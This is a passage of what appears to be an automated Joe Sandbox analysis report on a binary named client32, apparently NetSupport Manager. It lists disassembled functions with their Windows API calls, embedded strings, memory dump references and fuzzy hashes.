                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                              • API String ID: 2168136238-4289949731
                                                                                                                              • Opcode ID: 052df99301aa79c891ba59b0516b66f2217b59ccfb3a7ebbd94181076e91f896
                                                                                                                              • Instruction ID: 18e91b11eabefdaa2a38ccec96168d260a1d237358dab459284690cf681537c3
                                                                                                                              • Opcode Fuzzy Hash: 052df99301aa79c891ba59b0516b66f2217b59ccfb3a7ebbd94181076e91f896
                                                                                                                              • Instruction Fuzzy Hash: A141A3B2B012458FD724CE5ED8849DEF7EAEBC5764B20492EE552C7780DB70AC418791
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100A390 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _sprintf
                                                                                                                              • String ID: Error. soundlevel < -32768 $Error. soundlevel > 32767$Warning. %s$f[%d]=%f, < -1.0$f[%d]=%f, > 1.0
                                                                                                                              • API String ID: 1467051239-371636152
                                                                                                                              • Opcode ID: f275aff281fec65e287fd4839cb214d6aa70ab525a81e0f2bd918c20378b1889
                                                                                                                              • Instruction ID: 522ba922067402ac051fad8bc1310d1daa1aefdf4381fc39071b0cd0fb0c6887
                                                                                                                              • Opcode Fuzzy Hash: f275aff281fec65e287fd4839cb214d6aa70ab525a81e0f2bd918c20378b1889
                                                                                                                              • Instruction Fuzzy Hash: 19416936E04249CBC700DFA8C884ADDFBB4FF85244F6546BDD8981B346DB326995CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100F480 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 1100F554
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 1100F562
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
                                                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                              • String ID: bad cast
                                                                                                                              • API String ID: 2427920155-3145022300
                                                                                                                              • Opcode ID: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                                                              • Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
                                                                                                                              • Opcode Fuzzy Hash: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                                                              • Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110CE050 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32 ref: 110CE0C5
                                                                                                                              • GetClientRect.USER32 ref: 110CE0F8
                                                                                                                              • GetWindowRect.USER32 ref: 110CE103
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Rect$Window$ClientErrorExitLastMessageProcesswsprintf
                                                                                                                              • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$hWnd$m_hWnd
                                                                                                                              • API String ID: 2908456680-3958695921
                                                                                                                              • Opcode ID: ac731b858161620e6f0038696839bc89a3ec0d0576b516d3effa5ffef0383c02
                                                                                                                              • Instruction ID: 712cfbea46f41dce34da92735377c28625c10b46f47693fc43de73f5d42021ce
                                                                                                                              • Opcode Fuzzy Hash: ac731b858161620e6f0038696839bc89a3ec0d0576b516d3effa5ffef0383c02
                                                                                                                              • Instruction Fuzzy Hash: 4A316275D00219AFDB14CFA8CC81EEEFBB4EF49318F1481A9E9566B244D730A944CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110CC360 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32 ref: 110CC387
                                                                                                                              • GetWindowRect.USER32 ref: 110CC38A
                                                                                                                              • MapWindowPoints.USER32 ref: 110CC39C
                                                                                                                              • MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                                                              • GetDlgItem.USER32 ref: 110CC401
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ItemRect$DialogPoints
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3303679393-3916222277
                                                                                                                              • Opcode ID: 2249c09f5b4b130edb7ef8f619f74de815b9352330d3f536cd16acfa57f50e53
                                                                                                                              • Instruction ID: 5736af7a59c5bbb3b2c62e90579a0a420b4469d74747aaa82dc812657f03fbc3
                                                                                                                              • Opcode Fuzzy Hash: 2249c09f5b4b130edb7ef8f619f74de815b9352330d3f536cd16acfa57f50e53
                                                                                                                              • Instruction Fuzzy Hash: A7314F75E0020EAFCB18CFA9D985EAFBBB8EB88704F10855DE515E7244D774AE40CB64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1101E100 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32 ref: 1101E140
                                                                                                                              • GetDlgItem.USER32 ref: 1101E199
                                                                                                                              • GetWindowRect.USER32 ref: 1101E1A0
                                                                                                                              • GetDlgItem.USER32 ref: 1101E1AF
                                                                                                                              • GetWindowRect.USER32 ref: 1101E1B6
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • m_hWnd, xrefs: 1101E125
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101E120
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: RectWindow$Item$ErrorExitLastMessageProcesswsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 2038946005-2830328467
                                                                                                                              • Opcode ID: 620dae07eedfae8235f2d3a280bb26459a1a4424cf46755cf2ac384f868e5aac
                                                                                                                              • Instruction ID: 1bb08d0e26d3f84db878e7f9f950f280f16ec03f41355f49a35b763b070fbd80
                                                                                                                              • Opcode Fuzzy Hash: 620dae07eedfae8235f2d3a280bb26459a1a4424cf46755cf2ac384f868e5aac
                                                                                                                              • Instruction Fuzzy Hash: 89315C74D0031AEFCB14DFB5C984AEEFBB9FB48308F108569E51667604EB71A954CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110812A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memmove.LIBCMT ref: 1108132F
                                                                                                                              • _memset.LIBCMT ref: 11081318
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                                                                              • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                                                                              • API String ID: 75970324-4264523126
                                                                                                                              • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                                                              • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                                                                              • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                                                              • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1108C280 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindWindowA.USER32 ref: 1108C2B4
                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108C2D3
                                                                                                                              • OpenProcess.KERNEL32(00000440,00000000,04000000,110ED099,?,04000000,00000000,?,00000000,00000000,?,00000000,110ECF7D,?,110ED099,0000070B), ref: 1108C2E9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ProcessWindow$FindOpenThread
                                                                                                                              • String ID: Error. NULL hToken$Progman
                                                                                                                              • API String ID: 3432422346-976623215
                                                                                                                              • Opcode ID: 27d9adcea033cca8a9313adc041a3d51743ac848c4f94076432c31519aeea56b
                                                                                                                              • Instruction ID: a798542badd3240e5ba587e482d1b03e6f16632b9767cf240999fd85d1b1ba7e
                                                                                                                              • Opcode Fuzzy Hash: 27d9adcea033cca8a9313adc041a3d51743ac848c4f94076432c31519aeea56b
                                                                                                                              • Instruction Fuzzy Hash: 8A11D676E4021C9BD714CFF4C985BEDF7F8DB4C219F0041A9E916A7644DB71A900CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadMenuA.USER32 ref: 1100340E
                                                                                                                              • GetSubMenu.USER32 ref: 1100343A
                                                                                                                              • GetSubMenu.USER32 ref: 1100345C
                                                                                                                              • DestroyMenu.USER32(00000000), ref: 1100346A
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                              • API String ID: 468487828-934300333
                                                                                                                              • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                                                              • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                                                                              • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                                                              • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadMenuA.USER32 ref: 1100331D
                                                                                                                              • GetSubMenu.USER32 ref: 11003343
                                                                                                                              • GetMenuItemCount.USER32 ref: 11003367
                                                                                                                              • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
